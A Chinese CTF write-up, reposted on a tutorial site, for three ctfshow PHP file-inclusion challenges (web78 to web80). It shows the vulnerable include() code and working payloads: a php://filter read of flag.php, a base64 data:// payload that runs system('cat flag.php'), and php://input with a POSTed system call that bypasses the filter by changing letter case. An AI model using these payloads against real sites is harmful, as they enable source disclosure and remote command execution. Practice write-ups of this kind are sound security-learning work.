C/C++教程
ctfshow—文件包含
本文主要是介绍ctfshow—文件包含,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
参考
PHP伪协议总结 - SegmentFault 思否
WEB78 无防护读取源码
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
伪协议读取后base64解密
payload:?file=php://filter/convert.base64-encode/resource=flag.php
web79 data协议
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
过滤了php,php到是可以用大写绕过,但是文件名flag.php中的php不能大小写,所以用cat这一类的函数,也可以直接base64绕过php
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');
ils/120361970
查看源代码
web80 input协议
<?php
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
php data被过滤
用input协议
继续使用php大小写绕过
GET:
?file=phP://input
POST:
<?PHP system('tac fl*');?>
这篇关于ctfshow—文件包含的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
您可能喜欢
-
UniApp 中组件的生命周期是多少-icode9专业技术文章分享11-01
-
如何使用Svg Sprite Icon简化网页图标管理11-01
-
Excel数据导出课程:新手从入门到精通的实用教程10-31
-
Excel数据导入课程:新手入门指南10-31
-
RBAC的权限课程:新手入门教程10-31
-
Svg Sprite Icon课程:新手入门必备指南10-31
-
怎么配置 L2TP 允许多用户连接-icode9专业技术文章分享10-31
-
怎么在FreeBSD上 安装 OpenResty-icode9专业技术文章分享10-31
-
运行 modprobe l2tp_ppp 时收到“module not found”消息提醒是什么-icode9专业技术文章分享10-31
-
FreeBSD的下载命令有哪些-icode9专业技术文章分享10-31
-
在 FreeBSD 上怎么解压 .gz 文件-icode9专业技术文章分享10-31
-
怎么在 FreeBSD 上进行编译和安装软件-icode9专业技术文章分享10-31
-
在 FreeBSD 上怎么从源码进行编译和安装软件-icode9专业技术文章分享10-31
-
怎么在 FreeBSD 上启动 OpenResty-icode9专业技术文章分享10-31
-
怎么在FreeBSD中创建用户www和用户组www,并给相应的权限-icode9专业技术文章分享10-31
栏目导航
